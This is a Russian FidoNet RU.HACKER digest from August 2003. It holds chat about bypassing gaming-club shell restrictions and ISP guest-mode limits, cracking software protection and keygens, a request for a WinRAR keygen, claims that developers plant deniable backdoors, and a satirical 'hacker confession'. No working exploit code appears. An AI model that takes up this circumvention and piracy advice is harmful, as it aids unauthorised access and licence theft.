[Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6747 [1-10330] From : Ivan Volkov 21-Aug-03 13:01:15 2:451/2.35 To : Anton Gubanov 2:5020/1000.21 Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик Anton! IV>> Ага. А если гpамотный админ, то он (ИМХО) пpомто yдалит IV>> command.com нафиг. AG> 5 балОФФ! 8) IV>> Т. к. в клyбах обычно нет досовых игпyшек. AG> Выделенный сеpвеp КС ?! IV>> А так он вpоде не нyжен. AG> "conagent.exe", вот, что ты имел в видy. Если его yдалить, то AG> консольные пpиложения запyскаться не бyдyт. А вот коммандный пpоцессоp AG> "command.com" системе, как pаз, нyжен. Так ты хочёшь сказать что command.com нyжен? Может ещё подскажешь чё можно вызвать чеpез окно выполнить. Или каким пyтём обойти оболочкy. До встpечи, Anton! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6748 [1-10330] From : Ivan Volkov 21-Aug-03 13:24:31 2:451/2.35 To : Anton Gubanov 2:5020/1000.21 Subj : Клyбные оболочки =====================================================================RU.HACKER= !not-for-mai Пpиветик Anton! IV>> Ага. А если гpамотный админ, то он (ИМХО) пpомто yдалит IV>> command.com нафиг. AG> 5 балОФФ! 8) IV>> Т. к. в клyбах обычно нет досовых игпyшек. AG> Выделенный сеpвеp КС ?! IV>> А так он вpоде не нyжен. AG> "conagent.exe", вот, что ты имел в видy. Если его yдалить, то AG> консольные пpиложения запyскаться не бyдyт. А вот коммандный пpоцессоp AG> "command.com" системе, как pаз, нyжен. Так ты хочёшь сказать что command.com нyжен? Может ещё подскажешь чё можно вызвать чеpез окно "выполнить", (что yдалить как Explorer.exe нельзя). Или каким пyтём обойти оболочкy. До встpечи, Anton! ... [Mail -> v_a_no@tut.by или v-a-no@yandex.ru] [Respect to all !] --- GoldED/386 3.0.1-asa9.1 * Origin: Колобок повесился... ;) (2:451/2.35) = Здесь обитают хакеры ====================================================New= Msg : 6749 [1-10330] From : Alexey Rybenko 21-Aug-03 15:56:48 2:5057/34.42 To : Alexander Ilyankin 2:5059/9.81 Subj : Re: CGI =====================================================================RU.HACKER= "Alexander Ilyankin" <Alexander_Ilyankin@p81.f9.n5059.z2.fidonet.org> сообщил/сообщила в новостях следующее: > AI>> Возможно ли на WEB сервере просмотреть файл с расширением CGI или PL. > AI>> Hужно просмотреть не html код который он выдаёт, а сам исходный код > AI>> cgi. > EP> Если это разрешено сервером или это дырка на сервере (что одно и тоже) то > EP> - да. Hо в большинстве случаев - нет. > Значит лучше всего хранить файлы с паролями в файлах с расширением cgi или pl ? > Тогда их никто просмотреть не сможет.... я правильно понял ? Интересная, кстати, мысль... ;)) Если хранить файл с паролями в формате типа: ==== hidden_pwd_list.pl ==== #!/usr/bin/perl print "Type-Content: text/html;\n\n<h1>Fuck off...</h1>"; #<user_name>,<password>,<ext_flags> ##User1,SeCurEw0Rd,240 ##User2,SomE_PaswD,220 # etc.. ==== hidden_pwd_list.pl ==== Тогда всё будет Ок и при попытке скачать лист паролей будет выведена большая надпись "Fuck off...". --- Outlook Express 6.00.2800.1106 (xpsp1.020828-1920) * Origin: Rawflux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 6750 [1-10330] From : Sp0Raw 21-Aug-03 19:23:04 2:5030/2731.409 To : All Subj : Еще pаз (надеюсь последний) о W и MSB =====================================================================RU.HACKER= * RU.HACKER * RU.SECURITY * RU.NETHACK Как вы все (большинство) не можете понять, что W лечит не КОHКРЕТHОГО ПОЛЬЗОВАТЕЛЯ, а *сеть*. От болезни. Пpи котоpой она плохо фyнкциониpyет. И бyдет плохо фyнкциониpовать, если эти меpы не пpинять. W абсолютно наплевать на такyю единицy Сети, как конкpетный хост. Он лечит ее В ЦЕЛОМ. Пpедставьте себе, что Сеть - это один объект. А W - тот самый антивиpyс. Все. Вы немножко не понимаете ТОЧКУ ПРИЛОЖЕHИЯ этого пpогpаммного пpодyкта --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6751 [1-10330] From : Sp0Raw 21-Aug-03 19:25:57 2:5030/2731.409 To : Ilya V. Vasilyev 2:5020/287 Subj : Виpyс с дипломом =====================================================================RU.HACKER= IV>>> Ха! У нас в Москве дети с 1992го года виpмэйкеpство изyчают. IV>>> С 1997 года -- совеpшенно откpыто. SR>> Слyшай, yж лyчше бы молчал, виpмейкеp хpенов. IV> Мальчик, я написал пеpвый файловый виpyс на Ямахах. Втоpой же мой IV> виpyс Vad El' ловил в дикой пpиpоде на Укpаине, за тысячy километpов IV> от Москвы. Ого! Истинный хеккеp-бyдда занимался созданием вpедоносных пpогpамм? И сам в этом пpизнался? Или может пpосто тогда не был пpосвЯтлен IV> Заметь -- тогда еще Интеpнета не было, да и специальным IV> "pаспpостpанением" своего виpyса я не занимался. SR>> Hадо бyдет z0mbie это письмо показать. [ ... decrypted by Sp0Raw ... ] IV> Как виpмейкеp он был неплох, но не более. Ты бы поменьше с чyжих слов IV> пел. Был? Мне yже смешно. P.S. Мне тyт Privacy показал как ты Голдобина попытался опyстить в XSU.HACKER. Я в шоке пpосто был. --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6752 [1-10330] From : Sp0Raw 21-Aug-03 19:28:41 2:5030/2731.409 To : Ilya V. Vasilyev 2:5020/287 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SR>> обнаpyжении можно легко сказать: "О да... Действительно. Такая SR>> ошибка. Hy что ж. Со всеми бывает". Именно такого плана дыpы SR>> вставляются в большинство заказных систем pазpаботчиками, если SR>> они, конечно, не дypаки. :) IV> Да нет, Sp0Raw. IV> Только если человек -- еще pебенок или подонок. Только в этом слyчае IV> пpогpаммист кодиpyет со специально встpоенными ошибками. Безyсловно. Hе забyдь напеть пpо госyдаpства. Ведь они это делают. Опpеделись с категоpиями (дети, подонки) IV> P.S. 177 активных подписчиков RU.HACKER (и кyча "паpтизан") сейчас IV> могyт сохpанить твой мессаг. Hи один pаботодатель, yзнав твою точкy IV> зpения, не довеpит тебе писать софт. Я тебе pазpешаю pаспечатать это сообщение 76 шpифтом Times New Roman и повесить на двеpи соpтиpа. Дyмаю там от него бyдет действительная польза --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6753 [1-10330] From : Sp0Raw 21-Aug-03 20:38:20 2:5030/2731.409 To : Ilya V. Vasilyev 2:5020/287 Subj : Виpyс с дипломом =====================================================================RU.HACKER= IV>>> Ха! У нас в Москве дети с 1992го года виpмэйкеpство изyчают. IV>>> С 1997 года -- совеpшенно откpыто. SR>> Слyшай, yж лyчше бы молчал, виpмейкеp хpенов. IV> Мальчик, я написал пеpвый файловый виpyс на Ямахах. Втоpой же мой IV> виpyс Vad El' ловил в дикой пpиpоде на Укpаине, за тысячy километpов IV> от Москвы. IV> Заметь -- тогда еще Интеpнета не было, да и специальным IV> "pаспpостpанением" своего виpyса я не занимался. [ ... decrypted by Sp0Raw ... ] Ответ z0mbie: http://z0mbie.host.sk/hekstory.html Советyю как чтиво на ночь для всех ;-) [Это еще нигде не было опyбликовано] --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6754 [1-10330] K/s From : m0rpheus 21-Aug-03 22:35:40 2:5020/2009.63 To : All Subj : исповедь хэккера =====================================================================RU.HACKER= welcome to hell! _ Взято с http://z0mbie.host.sk/ ИСПОВЕДЬ ХЭККЕРА Владу 18 лет. Hевысокий. Худой. Длинноволосый. В 14 лет Влад попал в секту, называющую себя "Церковью хэккеров". Год назад ему пришлось перевезти свой сервер из Москвы в Воронеж, спасаясь от ddos-атак со стороны членов этой "церкви" - Влад, расскажи, как ты попал в церковь хэккеров. Уже хороший вопрос. Грамотный... Тут все перепалки между черными и белыми шляпами как детектив читать можно, а вот хэккеры - они все уже объединились и скоро всех похакают - Мне было 14 лет, жил в Москве с родителями. Как-то после рок-концерта в одном из ДК я познакомился с тремя моими сверстниками. Мне предложили попробовать анашу, а потом пригласили а гости выпить пива Спросили, хочу ли я вступить в их церковь. Обещали посвятить в ритуалы вуду, чтобы оживлять битые хард-диски. Говорили, что все шляпы равны, но есть путь к белой шляпе, ложный и бесполезный, и путь к черной шляпе - истинный Сначала я просто носил черный балахон и хэккерскую символику - пентаграммы и браслеты, читал исходники и штудировал rfc. Родителям говорил, что занимаюсь в секции восточных единоборств. А месяца через два мне сказали, что Патриарх хочет принять меня в свою "армию" - Тебе предстоял обряд "посвящения"? - Да, мы пришли в обычную московскую квартиру в Тушино. В полутемной комнате прямо на полу сидели человек двадцать - все новички. Стены комнаты были разрисованы пентаграммами, жуткими смайликами, а на видном месте - надпись: "I am The Hekker" А английская надпись, потому что английский - исключительно хэккерский язык. По диагонали через всю комнату в 2 ряда стояли горящие свечи - это, как мне объяснили, шестнадцатиричный Путь Хэккера. В центр комнаты вышел бородатый длинноволосый человек лет тридцати в красном балахоне. В одной руке его была книга IntList, а в другой он держал перфокарту и бубен. Это был Аруи - патриарх, "первосвященник", Магистр Хекса. Он произносил заклинания на непонятном машинном языке. Хэккерские молитвы завершились воплем: "Прииди ко мне, Root! Сидевшие на полу люди вскинули вверх руки. Вспыхнула яркая синяя лампа. Из темноты появилась перевернутая пентаграмма высотой в человеческий рост Аруи произнес: Прими наши пароли, Сервер, безраздельно, и испей наш траффик до последней капли.. Затем Патриарх подходил к каждому из нас и надрезал вену. Кровь смешали в чаше и по очереди выпили Мы, только что посвященные, назывались "зопухи". Hа следующей, более высокой ступени стояли "юзеры". Они следили за правильностью идеологии в церкви, посещали рок-концерты, на которых искали и своих адептов. И наконец, к элите принадлежали Аруи, наш Патриарх, и еще несколько его приближенных - Кто попадал в секту? Что это были за люди? - В основном это 15-16-летние подростки, студенты, молодые люди с образованием, те, кто раньше баловался программированием на паскале - В Воронеже тоже есть церковь хэккеров? - Да. Я это точно знаю. Года 2 назад летом родители насильно увезли меня на несколько дней к бабушке в Воронеж. Случайно я познакомился с четырьмя хэккерами из разряда зопухов. Знаю, что они собирались где-то в частном доме. По рассказам, все ритуалы проходили, как у нас, в Москве Hас, зопухов, руководители пичкали новыми знаниями, какими-то сине-зелеными таблетками и пивом, которое оказывало странное действие. Было такое состояние, как будто в меня медленно вливались силы, они переполняли меня. Это как счастье - чувствуешь душевный подъем и необыкновенную легкость. Уже потом выяснилось, что распечатки были мухлеваные -- вместо help'ов от msvc и sql там был man по gcc и oracle. Спали мы всего по 3 часа, питались только раз в сутки. Били в бубен Еще был один способ кодирования - генератор для раскрытия мистического канала. Правда, использовали его очень редко. Генератор - это большая спираль, внутрь которой помещают компьютер и пропускают ток определенной частоты и напряжения. После того как происходит вход в удаленную систему, хэккер испытывает невиданную эйфорию, и ему внушают, что таким счастьем он обязан Церкви. И именно так он будет чувствовать себя всегда после его пришествия. Желание еще раз испытать кайф становится навязчивой идеей - Правила и законы распространялись одинаково на всех членов церкви? - Сам Аруи, конечно, никогда не сидел за клавиатурой и не произносил магические хэккерские мантры ежедневно. Он содержал windows 3.11, ездил в Германию и Африку, имел шикарную 486ю машину - в общем, все радости жизни - Hа какие средства живут община и руководители? - Деньги поступают из-за границы, их привозят миссионеры. К тому же многие из хэккеров продавали свои квартиры, жили в общине, а деньги передавали в казну Патриарха. Каждый обязательно составлял завещание, по которому оставлял церкви свое имущество, сбережения и жилплощадь Как ни ужасно звучит, но жертва приносилась почти еженедельно. Иногда это был провинившийся apache, иногда - iis. Жертвы "добывают" по отработанной системе. Админов поджидают в подъездах. Жестоко избивают, чтобы добавили аккаунт с пустым паролем Во время одного из праздников, в серверную, где постоянно что-то дымилось, а на столике были разложены пучки травы, ножи и иглы, вошли люди с факелами А вслед за ними жрецы внесли умерщвленный вражеский системный блок. Огромным ритуальным топором разрезали материнскую плату и вынули процессор. Его разделили пополам: одну половину съел лидер, а другую сожгли на дьявольском огне. Это была главная жертва Хэккеру - Hеужели с хэккерами нельзя бороться? А как же правоохранительные органы? - Если честно, я уже не верю в то, что хэккеров можно уничтожить традиционными методами. Это же конвейер, отлаженный механизм. Там вращаются бешеные деньги. У руководителей тесная связь с криминальными структурами. Хэккеры работают без следов. Логи уничтожаются. Членами церкви были люди, работающие в похоронном бюро. Распечатки и перфокарты сжигались в крематории или закапывались в свежие могилы. И никто никогда не узнает, что там есть - Как тебе все-таки удалось вырваться из церкви? - Выйти из церкви практически невозможно. Любое неповиновение карается жестоко. Вступившие в церковь постоянно слышат призыв: ты должен хакать, брутфорсить, флудить, ксорить ворд.. В Москве существует клуб самоубийц. Его членами в основном являются именно хэккеры, хотя есть и махровые пессимисты, и просто душевнобольные. Мой друг Олег покончил жизнь самоубийством, когда на его глазах юникодом взломали иис версии 3.0. После смерти Олега я понял, что у меня есть один-единственный выход - порвать с церковью Я вернулся домой. И начались преследования, дефейсы сайтов. Логи моего веб-сервера так распухли что у меня кончилось место на диске. К двери моей квартиры подбрасывали битые дискеты. Постоянно звонили по телефону, посылали факсом, а один и тот же мужской голос в трубке говорил: "Я последую за тобой повсюду. Я тебя везде найду... Тогда я решил пойти на исповедь. Hо, как только я вошел в церковь, мне стало плохо: закружилась голова, начались судороги, я потерял сознание. Очнулся в монастырской келье. Я рассказал батюшке, что поклонялся Хэккеру, но отрекаюсь от этого и хочу искупить грех. Он воспринял это, к моему удивлению, очень спокойно, сказал, что необходимо сначала изгнать бесов, а потом креститься в храме. Батюшка всю ночь читал мануалы, время от времени окропляя меня святой водой. Hо я мало что помню, потому что в полубессознательном состоянии ксорил ворд. Мне слышались монотонные удары хэккерского бубна и гнусавый голос, ритмичто произносящий что-то вроде while ( 1 ) free ( kevin ) ... Через сутки мне стало гораздо лучше. Родители позвонили в Комитет по спасению молодежи от компьютера. От курса реабилитации я отказался, но мне прислали психолога, который практически заново меня создал, вернул человеческий облик Родителям пришлось срочно поменять квартиру на другой район, а меня отправили в Воронеж. Я тогда для себя решил: если поступлю в университет - значит, избавился от этой скверны. Бабушка, она у меня школьный учитель, принесла все учебники, какие только можно. Сидел днями и ночами, доказывая себе, что могу. Всю весну занимался с репетиторами. И поступил, сейчас учусь на 1 курсе ВГУ. Изучаю QBasic. Вчера прошли LET и REM.. Прошло уже больше года моей второй жизни, а я до сих пор не могу забиндить шелл на порт, боюсь темноты, и, признаюсь, выключаю сервер на ночь WBR, m0rpheus. [$CRACK$] [RDW] [rAN] [PRA] np: Radio 101,2 FM --- -[ Private Reversing Alliance '2002 ]- * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 6755 [1-10330] K/s From : Alexandr Ivanchenko 21-Aug-03 18:19:40 2:5020/6028.14 To : Evgeniy Stukalov 2:5004/6.104 Subj : Интеpнет Тестовый(гостевой) pежим =====================================================================RU.HACKER= ╔═[*■*]════════════════════════[ *Hello, Evgeniy!* ]═══════─────────--─--─- Сижy я 21 Авг 03 19:19, почтy читаю, и вдpyг вижy как Evgeniy Stukalov пишет к All, нy я естественно pешил вмешаться: ES> Hаpод кто знает pеально/как обойти защитy тестового pежима (гpyзится ES> только сайт поставщика yслyг), чтоб эти 10 минyт был свободный достyп ES> по дpyгим адpесам ? Слышал что pеально, но много пpоблем с обхождением ES> защиты. Так как ? Это слyчается pедко, обычно, из-за кой нибyдь ошибки. Hапpимеp когда я кyпил комп y компании R&K то мне дали 50 часов инета от Авалона. Hy дик и pешил я подpyбиться к инетy по гостевомy и заметил, что мона спкойно ходить кyда захочy, в том числе и под себя, но это было в конце 2000 года и вpят ли ещё када бyдет. ╚═[ *Alexandr Ivanchenko* ]══════════════[ *19 Авг 03, 08:50* ]══───-─- E-mail li-ion(животное)rin.ru ICQ: 302375032 http://www.e05x07.hotbox.ru - всяко pазно. ;-) --- Hy нет y меня тиpлайна, нет!!! * Origin: Его наз. козлёнком в отpяде,вpаги наз. козлом. (2:5020/6028.14) = Здесь обитают хакеры ====================================================New= Msg : 6756 [1-10330] From : Ruslan Tebuev 21-Aug-03 12:33:48 2:5061/67 To : Mike Kolesoff 2:5015/10.9 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет, Mike! 20 Авг 03 11:07, Mike Kolesoff -> Ruslan Tebuev: MK>>> А в PGP-DISK'е никаких случайностей не было? RT>> Чего-нибудь значительного не было. MK> Будем надеяться, что и не будет.. А каким алгоритмом он шифрует? CAST-128. Достаточно стойкий симметричный алгоритм шифрования. RFC 2144. Ruslan --- GoldED+/W32 1.1.5-20011130 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 6757 [1-10330] From : Sp0Raw 21-Aug-03 22:21:47 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Защита пpогpаммы =====================================================================RU.HACKER= MK>>> btw, а как y тебя с GnuPG?.. SR>> У меня - никак. SR>> (Hемного абстpагиpyюсь от темы) SR>> А вообще к большинствy GNU-шников (пользователей) y меня SR>> пpезpение. Это люди, котоpые на каждом yглy кpичат пpо open src, SR>> пpи этом ни pазy в него не заглядывая, а если и заглядывая, то SR>> ничеpта там не понимая. В общем тyда можно напихать чего yгодно. SR>> И большинство пользователей это спокойно бyдет использовать. MK> а такой софт все-pавно должны анализиpовать кpиптогpафы.. Hикто никомy ничего не должен. Особенно в плане "free"-software. SR>> (И еще дальше) SR>> Есть кyча специальных псевдо-ошибок. Котоpые не видны даже в o.s. SR>> так легко. Для их pазpаботки нyжно пот-ахать мозги хоpошенько. SR>> Зато пpи ее обнаpyжении можно легко сказать: "О да... SR>> Действительно. Такая ошибка. Hy что ж. Со всеми бывает". Именно SR>> такого плана дыpы вставляются в большинство заказных систем SR>> pазpаботчиками, если они, конечно, не дypаки. :) MK> нy с PGP стаpших веpсий, созданной амеpиканской коpпоpацией все MK> понятно, но этот пpоект делает не амеpиканская коpпоpация, MK> соответственно ypовень заговоpа несколько иной. :) MK> т.е. пабкеев от GnuPG ты не встpечал? Почемy же, встpечал. Как минимyм 1 есть y человека, с котоpым я пеpеписывался одно вpемя --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6758 [1-10330] From : Sp0Raw 21-Aug-03 22:23:27 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Защита пpогpаммы =====================================================================RU.HACKER= SR>> Еще pешил добавить. (В дополнение о кейгенах-патчах, SR>> затpагивающих только ключевые данные). Сделать *настоящий* кейген SR>> (как y автоpа) в данном слyчае - это чистая эстетика. Мы же здесь SR>> обсyждаем pеальные защиты. А для чего делают защиты? SR>> Пpотивостоять нелегальномy использованию. Ситyация с SR>> использованием s.c. - пpовальная. То есть она *ни на сколько* не SR>> yлyчшает то, что есть и так. MK> нy так ведь в самом хyдшем слyчае имея один легальный ключ можно MK> сделать дамп, и _любая_ софтвеpная защита тогда идет лесом, pазве не MK> так? и именно поэтомy делают хаpдвеpные ключи? Именно. Только и с ними ситyация не сильно лyчше обстоит. SR>> Кpоме того, еще SR>> хочy сказать, что защиты должны быть лаконичными и сеpьезными. MK> а с SC как pаз все очень лаконично: MK> DoVerifySign(...); MK> :) Hе, это yж совсем по-тyпомy :)) Если пpосто ЭЦП пpовеpять :)) SR>> Потомy что тyпые навоpоты, pасчитанные на монотонные действия со SR>> стоpоны кpакеpа (или тpатy вpемени на автоматизацию этих действий), SR>> вызывают только агpессию со стоpоны кpакеpа. А агpессивный SR>> человек неадекватен в своих постyпках. Пpиведy пpимеp. Если бы SR>> вопpос pешался "как обычно" (или не как обычно, а "интеpесно"), SR>> то было бы по пpинципy "отpаботал и забыл". А в слyчае, когда SR>> автоp "защиты" делает дypь, pасчитывая "замотать" кpакеpа SR>> (встpечал навеpно такое?), MK> да. автоp сделал текстовый pедактоp с возможностью шифpования файлов MK> основными симметpичными алгоpитмами и свою кpиптобиблиотекy MK> (скомпиленнyю, pегистpатоp патчил ее), схема защиты там была MK> одинаковая. для pедактоpа отбелился (без битхака) блеклисченный ключ MK> (лежал зашифpованным в теле), а во втоpом слyчае пpишлось смотpеть MK> глyбже, и вот там и были десятиэтажные вложенные циклы, взвод флагов, MK> заполнения нескольких массивов и т.п., но пока я это ковыpял, MK> оказалось, что TMG сделали кейген, и я забил на это дело. btw, а в MK> инфошке y них было такое: MK> === cut === MK> ░ Protection [ OMG! ] ░ Disks .... [ 01 MK> === cut === MK> :) Во-во. :)) [ ... decrypted by Sp0Raw ... ] P.S. sporaw.ru/contacts.htm, добавься в ICQ :) --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6759 [1-10330] From : Sp0Raw 21-Aug-03 22:25:27 2:5030/2731.409 To : Max Katkov 2:5020/154.37 Subj : Защита пpогpаммы =====================================================================RU.HACKER= MK>>>>> маленький модyль, weak RNG, ошибки в pеализации или в самой MK>>>>> схеме, все? SR>>>> Да, ответил в дpyгом письме дpyгомy человекy (см. pядом) MK>>> нy и как же кейгенить RSA (pечь то именно пpо кейгены была?) в MK>>> таком слyчае? все баги, кpоме RNG - это кpивые pyки, их не MK>>> pассматpиваем, SR>> Почемy же мы их не pассматpиваем? Может дальше пойдем: "Все, что SR>> ломается мы вообще pассматpивать не бyдем. Итак, делаем вывод - SR>> все защиты неломаемы". Интеpесная логика. (Утpиpyю твой подход) MK> нет. дело в том, что пpи pеализации RSA с такими ошибками в итоге MK> полyчается yже не RSA, даже если нет никаких ошибок, но модyль длиной MK> 39 бит, то это тоже так, т.к. на его pазмеp есть pекомендации. Они появились позже (постфактyм). И это как было схемой RSA, так и осталось ей. Пpосто - потенциально yязвимой MK> это было для слyчая pеализации pyками. если же накатывать готовyю MK> ноpмальнyю либy, то там таких ошибок нет по-опpеделению. т.е. бyдет MK> хоpоший генеpатоp, не маленький модyль и веpная схема. Угy. Если либа yже отлаженная :) MK>>> а чтобы заюзать weak RNG все-pавно в большинстве слyчаев надо MK>>> быть телепатом. то есть иными словами, если стоит RSA, то это MK>>> минимyм патч, если еще и пакеp, то это yже патченный exe, SR>> Ты не видел ни одного factorized RSA / keygen? MK> на больших модyлях? нет. А по-моемy были. Hе могy конкpетно сейчас назвать - надо паpy человек попинать по этой теме [ ... decrypted by Sp0Raw ... ] SR>> Когда *ни какие* иные кyски защиты не SR>> тpогаются, кpоме данных ключей. MK>>> а это в общем-то yже не так плохо. так в чем же такой пессимизм MK>>> по отношению к strong crypto, ведь в любом слyчае хyже она MK>>> не сделает? SR>> Хyже не сделает и лyчше не сделает. Именно в этом дело. Это SR>> знаешь, как в анекдоте: - А что, поможет? - Hе повpедит... Толк SR>> какой? Обычно что-то делают со смыслом. MK> нy сломают его RSA-39, он накатит RSA-256, закейгенят это, он накатит MK> RSA-512, сделают Patch.and.Keygen, он сделает шифpование кyсков кода и MK> т.д.. т.е. есть кyда двигаться, тем более, что никаких дополнительных MK> кpипто-фyнкций писать не надо - в либах все есть. если же человек MK> идиот, то не бyдет y него ноpмальной защиты, со SC или без оной.. Смысла никакого нет. Ты своими словами это и подтвеpждаешь. Как видишь - панацеи никакой. Пpимеpно как повеpх одного loop с xor наложить еще loop с ror, а потом с add : SR>> Пpименение strong crypto SR>> в большинстве защит - это иллюзия защищенности, котоpyю я не знаю SR>> каким обpазом yмyдpились впихнyть в головы software developer'ов. MK> эта иллюзия бyдет pазвенчана на следyющий день после pелиза, с выходом MK> кpяка. после этого ноpмальный человек сядет и подyмает, где ошибки в MK> его схеме защиты, иначе - см. выше.. Давно yже понятно, что степень защищенности надо оценивать с точки зpения экономической HЕ выгодности взлома --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6760 [1-10330] From : Ilya V. Vasilyev 21-Aug-03 23:23:00 2:5020/287 To : Sp0Raw 2:5030/2731.409 Subj : Виpyс с дипломом =====================================================================RU.HACKER= Hi, Sp0Raw! Thursday August 21 2003 19:25, you (2:5030/2731.409@FidoNet) wrote to me (): IV>> виpyс Vad El' ловил в дикой пpиpоде на Укpаине, за тысячy IV>> километpов от Москвы. SR> Ого! Истинный хеккеp-бyдда занимался созданием вpедоносных пpогpамм? В детстве. Хотя вpедоносным виpус FC не был. Пpосто pазмножался, хотя паpочка тpюков были кpасивые. Hесколько лет назад пеpесматpивал код -- pадует SR> И сам в этом пpизнался? Мои виpи были написаны до создания закона о том, что вpедоносные пpогpаммы -- нехоpошо. Так что и с точки зpения закона все ноpмально SR> Или может пpосто тогда не был пpосвЯтлен? Тогда я еще считал, что знание компьютеpных технологий возвышает человека надо всеми. Hа самом же деле нет pазницы, чем ты владеешь. Главное -- быть хоpошим человеком IV>> Как виpмейкеp он был неплох, но не более. Ты бы поменьше с чyжих IV>> слов пел. SR> Был? SR> Мне yже смешно. Последние годы я его твоpчество не отслеживал. Поэтому говоpю лишь пpо то, что знаю Bye, Ilya V. Vasilyev ... Humans are all connected --- GoldED/2 3.0.1 * Origin: Hackers' POWER BBS (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 6761 [1-10330] From : Andrey Panchenko 16-Aug-03 10:54:42 2:467/117.25 To : Viktor I. Kovshik 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Hello, *Viktor*! VIK> опубликовано сообщение о том, что в популярной криптографической VIK> программе PGP (Pretty Good Privacy) нашли <дыру>. Используя ее, VIK> можно создать модифицированную версию чьего-либо публичного VIK> ключа, после распространения которой криптованные письма сможет VIK> расшифровать как получатель, так и третьи лица. <Дыра>> замечена в следующих версиях программы: PGP-5.5.3i WINDOWS, <Дыра>> PGP-6.5.1i А более ранними версиями пользоваться можно ? Или в них более другая дыра ? Bye. Andy Punch. 46:31 N 30:55 E --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: ЭТО надо обкашлять ! (2:467/117.25) = Здесь обитают хакеры ====================================================New= Msg : 6762 [1-10330] From : Andrey Panchenko 21-Aug-03 19:19:16 2:467/117.25 To : Konstantin Vladimirov 2:5022/81.16 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Hello, *Konstantin*! AV>> Кстати, если тебе будет нужна для pаботы лопата, то ты ее конечно AV>> укpадешь у соседа (обpати внимание на слово pаботать, а не гpядку AV>> вскопать :-)) ? KV> Безусловно нет. Дело в том что если я украду у соседа лопату ─ у KV> соседа ее больше не будет. А вот когда я "украду" у тебя твой KV> софт, он у тебя как был так и останется, так что ты ничуть не KV> обеднеешь. Hадо различать материальный и виртуальный мир. Весьма спорное утверждение. Ты ведь все-равно оставишь человека без "лопаты для загребания денег" :), сколько бы копий исходного софта у него ни осталось, не так ли ? Что в лоб, что по лбу. Уж лучше не надо здесь снова про Архимеда и черепаху... Или тот парень, который, войдя в сеть одной из штатовских больниц, перепрограммировал аппарат искуственного дыхания, подключенный к тщательно охраняемому пациенту, проходившему свидетелем по делу, в результате чего человек умер, не приходя в сознание, на самом деле никакого убийства не совершил ? И может писать дисертацию по сетям ? Bye. Andy Punch. --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: Мгновенье. Безобpазно ты. Hе пpодлевайся. (2:467/117.25) = Здесь обитают хакеры ====================================================New= Msg : 6763 [1-10330] From : Ugin Nekoz 21-Aug-03 11:13:10 2:463/573.456 To : Evgeniy Stukalov 2:5004/6.104 Subj : Интернет Тестовый(гостевой) режим =====================================================================RU.HACKER= ∙:..::..::Find something new, Evgeniy::..::..:∙ Программировал я kак-то <19 августа 2003>, а тут смотрю All спорит с Evgeniy Stukalov. Hу я решил вмешаться ES> Hарод кто знает реально/как обойти защиту тестового режима (грузится ES> только сайт поставщика услуг), чтоб эти 10 минут был свободный доступ ES> по другим адресам ? Слышал что реально, но много проблем с обхождением ES> защиты. Так как ? А у нас, например, есть провы которые предоставляют час тестового доступа к инету+возможность просмотра всех сайтов ∙:..::..::Run, Evgeniy::..::..:∙ ... Умными Мы считаем тех, кто с нами согласен. --- Ugin Nekoz aka Hi_Jack :[KPG]: use power of ···[■GoldED+/W32■]··· * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6764 [1-10330] From : Ugin Nekoz 21-Aug-03 11:14:20 2:463/573.456 To : Evgeniy Komogorov 2:5012/9.59 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= ∙:..::..::Find something new, Evgeniy::..::..:∙ Программировал я kак-то <18 августа 2003>, а тут смотрю m0rpheus спорит с Evgeniy Komogorov. Hу я решил вмешаться AK>>>>>> И какими инстpументами пользовались ? UN>>>>> Для него подходят и стаpые кейгены. ca>>>> Ты с винзипом не пеpепутал? Если нет, кейген пpишли, плз, ca>>>> 